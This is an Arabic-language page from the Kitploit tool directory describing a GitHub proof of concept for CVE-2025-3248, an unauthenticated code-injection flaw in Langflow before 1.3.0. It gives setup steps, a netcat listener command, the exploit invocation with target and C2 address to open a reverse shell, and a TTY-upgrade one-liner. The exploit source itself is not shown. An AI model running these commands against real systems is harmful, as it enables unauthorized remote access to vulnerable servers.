Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-3248 — PoC لتحقيق RCE في إصدارات Langflow <1.3.0 | Kitploit
أدوات/GitHubGitHub/wand3rlust/cve-2025-3248
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةتطوير الحمولات
GitHubwand3rlust/cve-2025-3248

CVE-2025-3248

PoC لتحقيق RCE في إصدارات Langflow <1.3.0

عرض المستودع
منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-3248

مقدمة

إصدارات Langflow قبل 1.3.0 معرضة لحقن كود بدون مصادقة في نقطة النهاية /api/v1/validate/code عبر دالة exec() في بايثون. يقيم هذا الاستغلال اتصال صدفة عكسية مستغلًا هذه الثغرة.

الاستخدام

الإعداد

root@kitploit:~
git clone https://github.com/wand3rlust/CVE-2025-3248.git
cd CVE-2025-3248/
python3 -m venv venv
. venv/bin/activate
pip install -r requirements.txt

التطبيق المعرض للثغرة

root@kitploit:~
docker pull langflowai/langflow:1.1.4
docker run -p 7860:7860 langflowai/langflow:1.1.4

التشغيل

root@kitploit:~
# Terminal 1
nc -nvlp <C2_PORT>

# Terminal 2
python3 cve-2025-3248.py <TARGET_URL> <C2_IP> <C2_PORT>

مثال: python3 cve-2025-3248.py http://10.10.10.1:7860 10.0.13.37 1337

ملاحظة: لترقية الصدفة إلى TTY، نفّذ الأمر التالي بعد الحصول على الصدفة.

python -c 'import pty; pty.spawn("/bin/bash")'

العرض التوضيحي

عرض توضيحي

المراجع

  • الاستشارة الأمنية: https://nvd.nist.gov/vuln/detail/CVE-2025-3248
  • GitHub: https://github.com/langflow-ai/langflow/security/advisories/GHSA-rvqx-wpfh-mfx7
  • الاستغلال الأصلي: https://www.exploit-db.com/exploits/52262
تنزيل الأداة